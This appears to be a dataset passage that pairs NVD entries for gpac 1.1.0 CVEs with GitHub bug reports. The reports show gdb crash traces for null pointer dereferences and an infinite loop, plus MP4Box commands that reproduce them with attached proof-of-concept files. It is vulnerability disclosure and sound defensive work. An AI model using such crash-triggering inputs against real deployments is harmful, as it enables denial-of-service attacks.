────────────────────────────────────────────[ BACKTRACE ]───────────────────────────────────────────── ► f 0 0x7ffff76c4089 __strcasecmp_l_avx+69 f 1 0x7ffff790dc51 BD_CheckSFTimeOffset+49 f 2 0x7ffff790ed35 gf_bifs_dec_sf_field+2053 f 3 0x7ffff790f4c0 BD_DecMFFieldVec+656 f 4 0x7ffff790fa3f gf_bifs_dec_node_mask+287 f 5 0x7ffff790e158 gf_bifs_dec_node+936 f 6 0x7ffff79062f8 gf_bifs_dec_proto_list+1560 f 7 0x7ffff7906559 BD_DecSceneReplace+73 ────────────────────────────────────────────────────────────────────────────────────────────────────── pwndbg> bt #0 __strcasecmp_l_avx () at ../sysdeps/x86_64/multiarch/strcmp-sse42.S:199 #1 0x00007ffff790dc51 in BD_CheckSFTimeOffset () from /root/fuckit/test/gpac1210/bin/gcc/libgpac.so.10 #2 0x00007ffff790ed35 in gf_bifs_dec_sf_field () from /root/fuckit/test/gpac1210/bin/gcc/libgpac.so.10 #3 0x00007ffff790f4c0 in BD_DecMFFieldVec () from /root/fuckit/test/gpac1210/bin/gcc/libgpac.so.10 #4 0x00007ffff790fa3f in gf_bifs_dec_node_mask () from /root/fuckit/test/gpac1210/bin/gcc/libgpac.so.10 #5 0x00007ffff790e158 in gf_bifs_dec_node () from /root/fuckit/test/gpac1210/bin/gcc/libgpac.so.10 #6 0x00007ffff79062f8 in gf_bifs_dec_proto_list () from /root/fuckit/test/gpac1210/bin/gcc/libgpac.so.10 #7 0x00007ffff7906559 in BD_DecSceneReplace () from /root/fuckit/test/gpac1210/bin/gcc/libgpac.so.10 #8 0x00007ffff7914e5e in BM_SceneReplace () from /root/fuckit/test/gpac1210/bin/gcc/libgpac.so.10 #9 0x00007ffff7915023 in BM_ParseCommand () from /root/fuckit/test/gpac1210/bin/gcc/libgpac.so.10 #10 0x00007ffff7915353 in gf_bifs_decode_command_list () from /root/fuckit/test/gpac1210/bin/gcc/libgpac.so.10 #11 0x00007ffff7aa1d91 in gf_sm_load_run_isom () from /root/fuckit/test/gpac1210/bin/gcc/libgpac.so.10 #12 0x00005555555844a8 in dump_isom_scene () #13 0x000055555557b42c in mp4boxMain () #14 0x00007ffff75630b3 in __libc_start_main (main=0x55555556c420 <main>, argc=3, argv=0x7fffffffe188, init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end=0x7fffffffe178) at ../csu/libc-start.c:308 #15 0x000055555556c45e in _start () ``` `break BD_CheckSFTimeOffset` ``` 0x00007ffff790dc4c in BD_CheckSFTimeOffset () from /root/fuckit/test/gpac1210/bin/gcc/libgpac.so.10 LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA ────────────────────────────────────────────[ REGISTERS ]───────────────────────────────────────────── RAX 0x67 RBX 0x5555555decb0 ◂— 0x0 RCX 0x0 RDX 0x7fffffff6740 ◂— 0x200000002 *RDI 0x0 RSI 0x7ffff7dfd2d7 ◂— 'startTime' R8 0x0 R9 0x0 R10 0x7ffff775b844 ◂— 'gf_node_get_tag' R11 0x7ffff7849790 (gf_node_get_tag) ◂— endbr64 R12 0x0 R13 0x5555555dfe70 —▸ 0x5555555dfed0 ◂— 0x100000067 /* 'g' */ R14 0x5555555dff50 ◂— 0x21e8e8512be35500 R15 0x0 RBP 0x7fffffff6740 ◂— 0x200000002 RSP 0x7fffffff6690 —▸ 0x5555555decb0 ◂— 0x0 *RIP 0x7ffff790dc4c (BD_CheckSFTimeOffset+44) ◂— call 0x7ffff77e0db0 ──────────────────────────────────────────────[ DISASM ]────────────────────────────────────────────── 0x7ffff790dc39 <BD_CheckSFTimeOffset+25> cmp eax, 1 0x7ffff790dc3c <BD_CheckSFTimeOffset+28> je BD_CheckSFTimeOffset+144 <BD_CheckSFTimeOffset+144> 0x7ffff790dc3e <BD_CheckSFTimeOffset+30> mov r12, qword ptr [rbp + 0x10] 0x7ffff790dc42 <BD_CheckSFTimeOffset+34> lea rsi, [rip + 0x4ef68e] 0x7ffff790dc49 <BD_CheckSFTimeOffset+41> mov rdi, r12 ► 0x7ffff790dc4c <BD_CheckSFTimeOffset+44> call strcasecmp@plt <strcasecmp@plt> s1: 0x0 s2: 0x7ffff7dfd2d7 ◂— 'startTime' 0x7ffff790dc51 <BD_CheckSFTimeOffset+49> test eax, eax 0x7ffff790dc53 <BD_CheckSFTimeOffset+51> jne BD_CheckSFTimeOffset+112 <BD_CheckSFTimeOffset+112> 0x7ffff790dc55 <BD_CheckSFTimeOffset+53> mov edx, dword ptr [rbx + 0x6c] 0x7ffff790dc58 <BD_CheckSFTimeOffset+56> test edx, edx 0x7ffff790dc5a <BD_CheckSFTimeOffset+58> jne BD_CheckSFTimeOffset+80 <BD_CheckSFTimeOffset+80> ──────────────────────────────────────────────[ STACK ]─────────────────────────────────────────────── 00:0000│ rsp 0x7fffffff6690 —▸ 0x5555555decb0 ◂— 0x0 01:0008│ 0x7fffffff6698 —▸ 0x5555555d26d0 ◂— 0x0 02:0010│ 0x7fffffff66a0 —▸ 0x7fffffff6740 ◂— 0x200000002 03:0018│ 0x7fffffff66a8 —▸ 0x7ffff790ed35 (gf_bifs_dec_sf_field+2053) ◂— mov eax, dword ptr [rbx] 04:0020│ 0x7fffffff66b0 —▸ 0x5555555dfe90 ◂— 0x11cb 05:0028│ 0x7fffffff66b8 ◂— 0x22 /* '"' */ 06:0030│ 0x7fffffff66c0 ◂— 0x11cb 07:0038│ 0x7fffffff66c8 —▸ 0x7fffffff67d0 ◂— 0x2200000002 ────────────────────────────────────────────[ BACKTRACE ]───────────────────────────────────────────── ► f 0 0x7ffff790dc4c BD_CheckSFTimeOffset+44 f 1 0x7ffff790ed35 gf_bifs_dec_sf_field+2053 f 2 0x7ffff790f4c0 BD_DecMFFieldVec+656 f 3 0x7ffff790fa3f gf_bifs_dec_node_mask+287 f 4 0x7ffff790e158 gf_bifs_dec_node+936 f 5 0x7ffff79062f8 gf_bifs_dec_proto_list+1560 f 6 0x7ffff7906559 BD_DecSceneReplace+73 f 7 0x7ffff7914e5e BM_SceneReplace+110 ``` ``` Program received signal SIGSEGV, Segmentation fault. __strcasecmp_l_avx () at ../sysdeps/x86_64/multiarch/strcmp-sse42.S:199 199 in ../sysdeps/x86_64/multiarch/strcmp-sse42.S LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA ────────────────────────────────────────────[ REGISTERS ]───────────────────────────────────────────── RAX 0x0 RBX 0x5555555decb0 ◂— 0x0 RCX 0x17 RDX 0x7ffff77284a0 (_nl_global_locale) —▸ 0x7ffff77246c0 (_nl_C_LC_CTYPE) —▸ 0x7ffff76f4fc6 (_nl_C_name) ◂— 0x636d656d5f5f0043 /* 'C' */ RDI 0x0 RSI 0x7ffff7dfd2d7 ◂— 'startTime' R8 0x0 R9 0x0 R10 0x7ffff775b844 ◂— 'gf_node_get_tag' R11 0x7ffff7849790 (gf_node_get_tag) ◂— endbr64 R12 0x0 R13 0x5555555dfe70 —▸ 0x5555555dfed0 ◂— 0x100000067 /* 'g' */ R14 0x5555555dff50 ◂— 0x21e8e8512be35500 R15 0x0 RBP 0x7fffffff6740 ◂— 0x200000002 RSP 0x7fffffff6688 —▸ 0x7ffff790dc51 (BD_CheckSFTimeOffset+49) ◂— test eax, eax RIP 0x7ffff76c4089 (__strcasecmp_l_avx+69) ◂— vmovdqu xmm1, xmmword ptr [rdi] ──────────────────────────────────────────────[ DISASM ]────────────────────────────────────────────── 0x7ffff76c4077 <__strcasecmp_l_avx+51> vmovdqa xmm6, xmmword ptr [rip + 0x378f1] 0x7ffff76c407f <__strcasecmp_l_avx+59> cmp ecx, 0x30 0x7ffff76c4082 <__strcasecmp_l_avx+62> ja __strcasecmp_l_avx+172 <__strcasecmp_l_avx+172> 0x7ffff76c4084 <__strcasecmp_l_avx+64> cmp eax, 0x30 0x7ffff76c4087 <__strcasecmp_l_avx+67> ja __strcasecmp_l_avx+172 <__strcasecmp_l_avx+172> ► 0x7ffff76c4089 <__strcasecmp_l_avx+69> vmovdqu xmm1, xmmword ptr [rdi] 0x7ffff76c408d <__strcasecmp_l_avx+73> vmovdqu xmm2, xmmword ptr [rsi] 0x7ffff76c4091 <__strcasecmp_l_avx+77> vpcmpgtb xmm7, xmm1, xmm4 0x7ffff76c4095 <__strcasecmp_l_avx+81> vpcmpgtb xmm8, xmm1, xmm5 0x7ffff76c4099 <__strcasecmp_l_avx+85> vpcmpgtb xmm9, xmm2, xmm4 0x7ffff76c409d <__strcasecmp_l_avx+89> vpcmpgtb xmm10, xmm2, xmm5 ──────────────────────────────────────────────[ STACK ]─────────────────────────────────────────────── 00:0000│ rsp 0x7fffffff6688 —▸ 0x7ffff790dc51 (BD_CheckSFTimeOffset+49) ◂— test eax, eax 01:0008│ 0x7fffffff6690 —▸ 0x5555555decb0 ◂— 0x0 02:0010│ 0x7fffffff6698 —▸ 0x5555555d26d0 ◂— 0x0 03:0018│ 0x7fffffff66a0 —▸ 0x7fffffff6740 ◂— 0x200000002 04:0020│ 0x7fffffff66a8 —▸ 0x7ffff790ed35 (gf_bifs_dec_sf_field+2053) ◂— mov eax, dword ptr [rbx] 05:0028│ 0x7fffffff66b0 —▸ 0x5555555dfe90 ◂— 0x11cb 06:0030│ 0x7fffffff66b8 ◂— 0x22 /* '"' */ 07:0038│ 0x7fffffff66c0 ◂— 0x11cb ────────────────────────────────────────────[ BACKTRACE ]───────────────────────────────────────────── ► f 0 0x7ffff76c4089 __strcasecmp_l_avx+69 f 1 0x7ffff790dc51 BD_CheckSFTimeOffset+49 f 2 0x7ffff790ed35 gf_bifs_dec_sf_field+2053 f 3 0x7ffff790f4c0 BD_DecMFFieldVec+656 f 4 0x7ffff790fa3f gf_bifs_dec_node_mask+287 f 5 0x7ffff790e158 gf_bifs_dec_node+936 f 6 0x7ffff79062f8 gf_bifs_dec_proto_list+1560 f 7 0x7ffff7906559 BD_DecSceneReplace+73 ```
Null Pointer Dereference in BD_CheckSFTimeOffset()
https://api.github.com/repos/gpac/gpac/issues/1969/comments
1
2021-12-10T15:21:14Z
2021-12-13T13:23:49Z
https://github.com/gpac/gpac/issues/1969
1,076,957,223
1,969
2,892
CVE-2021-44923
2021-12-21T21:15:07.717
A null pointer dereference vulnerability exists in gpac 1.1.0 in the gf_dump_vrml_dyn_field.isra function, which causes a segmentation fault and application crash.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/1962" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/1962" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gpac:gpac:1.1.0:*:*:*:*:*:*:*", "matchCriteriaId": "56FF2AB9-517D-43A7-867E-9FB6B833194F", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "476" ]
476
https://github.com/gpac/gpac/issues/1962
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "gpac", "gpac" ]
Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue - thank you! - [x] I looked for a similar issue and couldn't find any. - [x] I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/ - [x] I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command-line ...). I can share files anonymously with this dropbox: https://www.mediafire.com/filedrop/filedrop_hosted.php?drop=eec9e058a9486fe4e99c33021481d9e1826ca9dbc242a6cfaab0fe95da5e5d95 Detailed guidelines: http://gpac.io/2013/07/16/how-to-file-a-bug-properly/ A null pointer dereference was discovered in gf_dump_vrml_dyn_field.isra(). The vulnerability causes a segmentation fault and application crash. **Version:** ``` MP4Box - GPAC version 1.1.0-DEV-revUNKNOWN_REV (c) 2000-2021 Telecom Paris distributed under LGPL v2.1+ - http://gpac.io Please cite our work in your research: GPAC Filters: https://doi.org/10.1145/3339825.3394929 GPAC: https://doi.org/10.1145/1291233.1291452 GPAC Configuration: Features: GPAC_CONFIG_LINUX GPAC_64_BITS GPAC_HAS_IPV6 GPAC_HAS_SOCK_UN GPAC_MINIMAL_ODF GPAC_HAS_QJS GPAC_HAS_JPEG GPAC_HAS_PNG GPAC_HAS_LINUX_DVB GPAC_DISABLE_3D ``` **System information** Ubuntu 20.04 focal, AMD EPYC 7742 64-Core @ 16x 2.25GHz **command:** ``` ./MP4Box -lsr ./poc4 ``` [poc4.zip](https://github.com/gpac/gpac/files/7691639/poc4.zip) **Result** ``` [iso file] extra box maxr found in hinf, deleting [iso file] extra box maxr found in hinf, deleting [iso file] Unknown box type 80rak in parent moov [iso file] Incomplete box mdat - start 11495 size 860238 [iso file] Incomplete file while reading for dump - aborting parsing [iso file] extra box maxr found in hinf, deleting [iso file] extra box maxr found in hinf, deleting [iso file] Unknown box type 80rak in parent moov [iso file] Incomplete box mdat - start 11495 size 860238 [iso file] Incomplete file while reading for dump - aborting parsing MPEG-4 BIFS Scene Parsing Scene loaded - dumping 1 systems streams [1] 414421 segmentation fault ./MP4Box -lsr ./poc4 ``` **gdb** ``` Program received signal SIGSEGV, Segmentation fault. 0x00007ffff7ac0797 in gf_dump_vrml_dyn_field.isra () from /root/fuckit/test/gpac-master/bin/gcc/libgpac.so.10 LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA ────────────────────────────────────────────[ REGISTERS ]───────────────────────────────────────────── RAX 0xa RBX 0x0 RCX 0x0 RDX 0x7ffff72bf040 ◂— 0x7ffff72bf040 RDI 0x7fffffff6af0 —▸ 0x7ffff75a21e0 (funlockfile) ◂— endbr64 RSI 0x0 R8 0xffffffff R9 0xa R10 0x7ffff7e37a2a ◂— 0x3e73252f3c00223d /* '="' */ R11 0x7ffff7df0c38 ◂— 0x6e776f6e6b6e75 /* 'unknown' */ R12 0x0 R13 0x0 R14 0x5555555ded60 —▸ 0x5555555d43b0 ◂— 0x0 R15 0x1 RBP 0x3c RSP 0x7fffffff7060 ◂— 0x3000000010 RIP 0x7ffff7ac0797 (gf_dump_vrml_dyn_field.isra+631) ◂— mov eax, dword ptr [r12] ──────────────────────────────────────────────[ DISASM ]────────────────────────────────────────────── ► 0x7ffff7ac0797 <gf_dump_vrml_dyn_field.isra+631> mov eax, dword ptr [r12] 0x7ffff7ac079b <gf_dump_vrml_dyn_field.isra+635> test eax, eax 0x7ffff7ac079d <gf_dump_vrml_dyn_field.isra+637> je gf_dump_vrml_dyn_field.isra+720 <gf_dump_vrml_dyn_field.isra+720> ↓ 0x7ffff7ac07f0 <gf_dump_vrml_dyn_field.isra+720> mov eax, dword ptr [rsp + 0x70] 0x7ffff7ac07f4 <gf_dump_vrml_dyn_field.isra+724> mov rdi, qword ptr [r14 + 0x10] 0x7ffff7ac07f8 <gf_dump_vrml_dyn_field.isra+728> test eax, eax 0x7ffff7ac07fa <gf_dump_vrml_dyn_field.isra+730> jne gf_dump_vrml_dyn_field.isra+292 <gf_dump_vrml_dyn_field.isra+292> ↓ 0x7ffff7ac0644 <gf_dump_vrml_dyn_field.isra+292> lea rsi, [rip + 0x35ac0b] 0x7ffff7ac064b <gf_dump_vrml_dyn_field.isra+299> xor eax, eax 0x7ffff7ac064d <gf_dump_vrml_dyn_field.isra+301> call gf_fprintf@plt <gf_fprintf@plt> 0x7ffff7ac0652 <gf_dump_vrml_dyn_field.isra+306> jmp gf_dump_vrml_dyn_field.isra+391 <gf_dump_vrml_dyn_field.isra+391> ──────────────────────────────────────────────[ STACK ]─────────────────────────────────────────────── 00:0000│ rsp 0x7fffffff7060 ◂— 0x3000000010 01:0008│ 0x7fffffff7068 —▸ 0x5555555df880 ◂— 0x31646c6569665f /* '_field1' */ 02:0010│ 0x7fffffff7070 ◂— 0x0 03:0018│ 0x7fffffff7078 ◂— 0x38b85a8f00 04:0020│ 0x7fffffff7080 ◂— 0x0 05:0028│ 0x7fffffff7088 ◂— 0x7aa5d2dbb85a8f00 06:0030│ 0x7fffffff7090 ◂— 0x1 07:0038│ 0x7fffffff7098 —▸ 0x7ffff7e27f46 ◂— 0x65646f6d73006325 /* '%c' */ ────────────────────────────────────────────[ BACKTRACE ]───────────────────────────────────────────── ► f 0 0x7ffff7ac0797 gf_dump_vrml_dyn_field.isra+631 f 1 0x7ffff7ac15d1 DumpProtos+305 f 2 0x7ffff7abb389 gf_sm_dump_command_list+857 f 3 0x7ffff7ac24fc gf_sm_dump+1116 f 4 0x555555584418 dump_isom_scene+616 f 5 0x55555557b42c mp4boxMain+9228 f 6 0x7ffff75630b3 __libc_start_main+243 ────────────────────────────────────────────────────────────────────────────────────────────────────── pwndbg> bt #0 0x00007ffff7ac0797 in gf_dump_vrml_dyn_field.isra () from /root/fuckit/test/gpac-master/bin/gcc/libgpac.so.10 #1 0x00007ffff7ac15d1 in DumpProtos () from /root/fuckit/test/gpac-master/bin/gcc/libgpac.so.10 #2 0x00007ffff7abb389 in gf_sm_dump_command_list () from /root/fuckit/test/gpac-master/bin/gcc/libgpac.so.10 #3 0x00007ffff7ac24fc in gf_sm_dump () from /root/fuckit/test/gpac-master/bin/gcc/libgpac.so.10 #4 0x0000555555584418 in dump_isom_scene () #5 0x000055555557b42c in mp4boxMain () #6 0x00007ffff75630b3 in __libc_start_main (main=0x55555556c420 <main>, argc=3, argv=0x7fffffffe1a8, init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end=0x7fffffffe198) at ../csu/libc-start.c:308 #7 0x000055555556c45e in _start () ```
Null Pointer Dereference in gf_dump_vrml_dyn_field.isra()
https://api.github.com/repos/gpac/gpac/issues/1962/comments
0
2021-12-10T09:31:57Z
2021-12-10T10:16:34Z
https://github.com/gpac/gpac/issues/1962
1,076,623,517
1,962
2,893
CVE-2021-44924
2021-12-21T21:15:07.760
An infinite loop vulnerability exists in gpac 1.1.0 in the gf_log function, which causes a Denial of Service.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/1959" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/1959" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gpac:gpac:1.1.0:*:*:*:*:*:*:*", "matchCriteriaId": "56FF2AB9-517D-43A7-867E-9FB6B833194F", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "835" ]
835
https://github.com/gpac/gpac/issues/1959
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "gpac", "gpac" ]
Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue - thank you! - [x] I looked for a similar issue and couldn't find any. - [x] I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/ - [x] I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command-line ...). I can share files anonymously with this dropbox: https://www.mediafire.com/filedrop/filedrop_hosted.php?drop=eec9e058a9486fe4e99c33021481d9e1826ca9dbc242a6cfaab0fe95da5e5d95 Detailed guidelines: http://gpac.io/2013/07/16/how-to-file-a-bug-properly/ An infinite loop was discovered in gf_log(). **Version:** ``` MP4Box - GPAC version 1.1.0-DEV-revUNKNOWN_REV (c) 2000-2021 Telecom Paris distributed under LGPL v2.1+ - http://gpac.io Please cite our work in your research: GPAC Filters: https://doi.org/10.1145/3339825.3394929 GPAC: https://doi.org/10.1145/1291233.1291452 GPAC Configuration: Features: GPAC_CONFIG_LINUX GPAC_64_BITS GPAC_HAS_IPV6 GPAC_HAS_SOCK_UN GPAC_MINIMAL_ODF GPAC_HAS_QJS GPAC_HAS_JPEG G [poc_hang.zip](https://github.com/gpac/gpac/files/7691188/poc_hang.zip) PAC_HAS_PNG GPAC_HAS_LINUX_DVB GPAC_DISABLE_3D ``` **System information** Ubuntu 20.04 focal, AMD EPYC 7742 64-Core @ 16x 2.25GHz **command:** ``` ./MP4Box -info ./poc_hang ``` [poc_hang.zip](https://github.com/gpac/gpac/files/7691192/poc_hang.zip) **Result** ``` ... [Core] exp-golomb read failed, not enough bits in bitstream ! [Core] exp-golomb read failed, not enough bits in bitstream ! [Core] exp-golomb read failed, not enough bits in bitstream ! [Core] exp-golomb read failed, not enough bits in bitstream ! [Core] exp-golomb read failed, not enough bits in bitstream ! [Core] exp-golomb read failed, not enough bits in bitstream ! [Core] exp-golomb read failed, not enough bits in bitstream ! [Core] exp-golomb read failed, not enough bits in bitstream ! [Core] exp-golomb read failed, not enough bits in bitstream ! [Core] exp-golomb read failed, not enough bits in bitstream ! [Core] exp-golomb read failed, not enough bits in bitstream ! [Core] exp-golomb read failed, not enough bits in bitstream ! [Core] exp-golomb read failed, not enough bits in bitstream ! [Core] exp-golomb read failed, not enough bits in bitstream ! [Core] exp-golomb read failed, not enough bits in bitstream ! [Core] exp-golomb read failed, not enough bits in bitstream ! [Core] exp-golomb read failed, not enough bits in bitstream ! [Core] exp-golomb read failed, not enough bits in bitstream ! [Core] exp-golomb read failed, not enough bits in bitstream ! [Core] exp-golomb read failed, not enough bits in bitstream ! [Core] exp-golomb read failed, not enough bits in bitstream ! [Core] exp-golomb read failed, not enough bits in bitstream ! [Core] exp-golomb read failed, not enough bits in bitstream ! [Core] exp-golomb read failed, not enough bits in bitstream ! ... ``` **gdb** ``` bt #0 0x00007ffff764d1e7 in __GI___libc_write (fd=2, buf=0x7ffffffebeb0, nbytes=62) at ../sysdeps/unix/sysv/linux/write.c:26 #1 0x00007ffff75ce00d in _IO_new_file_write (f=0x7ffff77285c0 <_IO_2_1_stderr_>, data=0x7ffffffebeb0, n=62) at fileops.c:1176 #2 0x00007ffff75ce928 in new_do_write (to_do=<optimized out>, data=0x7ffffffebeb0 "[Core] exp-golomb read failed, not enough bits in bitstream !\nn [0;31])\n", fp=0x7ffff77285c0 <_IO_2_1_stderr_>) at libioP.h:948 #3 _IO_new_file_xsputn (n=62, data=<optimized out>, f=<optimized out>) at fileops.c:1255 #4 _IO_new_file_xsputn (f=0x7ffff77285c0 <_IO_2_1_stderr_>, data=<optimized out>, n=62) at fileops.c:1197 #5 0x00007ffff75b90d3 in buffered_vfprintf (s=s@entry=0x7ffff77285c0 <_IO_2_1_stderr_>, format=format@entry=0x7ffff7e2cf98 "[Core] exp-golomb read failed, not enough bits in bitstream !\n", args=args@entry=0x7ffffffee4a0, mode_flags=mode_flags@entry=2) at ../libio/libioP.h:948 #6 0x00007ffff75b5ea4 in __vfprintf_internal (s=0x7ffff77285c0 <_IO_2_1_stderr_>, format=0x7ffff7e2cf98 "[Core] exp-golomb read failed, not enough bits in bitstream !\n", ap=0x7ffffffee4a0, mode_flags=2) at vfprintf-internal.c:1346 #7 0x00007ffff77f8a21 in default_log_callback_color () from /root/fuckit/test/gpac-master/bin/gcc/libgpac.so.10 #8 0x00007ffff77f8cc9 in gf_log () from /root/fuckit/test/gpac-master/bin/gcc/libgpac.so.10 #9 0x00007ffff79f4c95 in avc_parse_hrd_parameters () from /root/fuckit/test/gpac-master/bin/gcc/libgpac.so.10 #10 0x00007ffff79f7c09 in gf_avc_read_sps_bs_internal () from /root/fuckit/test/gpac-master/bin/gcc/libgpac.so.10 #11 0x00007ffff7a0b149 in gf_avc_read_sps () from /root/fuckit/test/gpac-master/bin/gcc/libgpac.so.10 #12 0x00007ffff792b724 in avcc_box_read () from /root/fuckit/test/gpac-master/bin/gcc/libgpac.so.10 #13 0x00007ffff796ac69 in gf_isom_box_parse_ex () from /root/fuckit/test/gpac-master/bin/gcc/libgpac.so.10 #14 0x00007ffff796c531 in gf_isom_box_array_read_ex () from /root/fuckit/test/gpac-master/bin/gcc/libgpac.so.10 #15 0x00007ffff793c2a3 in video_sample_entry_box_read () from /root/fuckit/test/gpac-master/bin/gcc/libgpac.so.10 #16 0x00007ffff796ac69 in gf_isom_box_parse_ex () from /root/fuckit/test/gpac-master/bin/gcc/libgpac.so.10 #17 0x00007ffff796c531 in gf_isom_box_array_read_ex () from /root/fuckit/test/gpac-master/bin/gcc/libgpac.so.10 #18 0x00007ffff796ac69 in gf_isom_box_parse_ex () from /root/fuckit/test/gpac-master/bin/gcc/libgpac.so.10 #19 0x00007ffff796c531 in gf_isom_box_array_read_ex () from /root/fuckit/test/gpac-master/bin/gcc/libgpac.so.10 #20 0x00007ffff793e083 in stbl_box_read () from /root/fuckit/test/gpac-master/bin/gcc/libgpac.so.10 #21 0x00007ffff796ac69 in gf_isom_box_parse_ex () from /root/fuckit/test/gpac-master/bin/gcc/libgpac.so.10 #22 0x00007ffff796c531 in gf_isom_box_array_read_ex () from /root/fuckit/test/gpac-master/bin/gcc/libgpac.so.10 #23 0x00007ffff793a3d0 in minf_box_read () from /root/fuckit/test/gpac-master/bin/gcc/libgpac.so.10 #24 0x00007ffff796ac69 in gf_isom_box_parse_ex () from /root/fuckit/test/gpac-master/bin/gcc/libgpac.so.10 #25 0x00007ffff796c531 in gf_isom_box_array_read_ex () from /root/fuckit/test/gpac-master/bin/gcc/libgpac.so.10 #26 0x00007ffff79394e9 in mdia_box_read () from /root/fuckit/test/gpac-master/bin/gcc/libgpac.so.10 #27 0x00007ffff796ac69 in gf_isom_box_parse_ex () from /root/fuckit/test/gpac-master/bin/gcc/libgpac.so.10 #28 0x00007ffff796c531 in gf_isom_box_array_read_ex () from /root/fuckit/test/gpac-master/bin/gcc/libgpac.so.10 #29 0x00007ffff794189a in trak_box_read () from /root/fuckit/test/gpac-master/bin/gcc/libgpac.so.10 #30 0x00007ffff796ac69 in gf_isom_box_parse_ex () from /root/fuckit/test/gpac-master/bin/gcc/libgpac.so.10 #31 0x00007ffff796c531 in gf_isom_box_array_read_ex () from /root/fuckit/test/gpac-master/bin/gcc/libgpac.so.10 #32 0x00007ffff796ac69 in gf_isom_box_parse_ex () from /root/fuckit/test/gpac-master/bin/gcc/libgpac.so.10 #33 0x00007ffff796b410 in gf_isom_parse_root_box () from /root/fuckit/test/gpac-master/bin/gcc/libgpac.so.10 #34 0x00007ffff79737ec in gf_isom_parse_movie_boxes_internal () from /root/fuckit/test/gpac-master/bin/gcc/libgpac.so.10 #35 0x00007ffff7974f67 in gf_isom_open_file () from /root/fuckit/test/gpac-master/bin/gcc/libgpac.so.10 #36 0x000055555557dc14 in mp4boxMain () #37 0x00007ffff75630b3 in __libc_start_main (main=0x55555556c420 <main>, argc=3, argv=0x7fffffffe1f8, init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end=0x7fffffffe1e8) at ../csu/libc-start.c:308 #38 0x000055555556c45e in _start () ```
Infinite loop in gf_log()
https://api.github.com/repos/gpac/gpac/issues/1959/comments
0
2021-12-10T08:26:37Z
2021-12-10T10:01:22Z
https://github.com/gpac/gpac/issues/1959
1,076,568,297
1,959
2,894
CVE-2021-44925
2021-12-21T21:15:07.803
A null pointer dereference vulnerability exists in gpac 1.1.0 in the gf_svg_get_attribute_name function, which causes a segmentation fault and application crash.
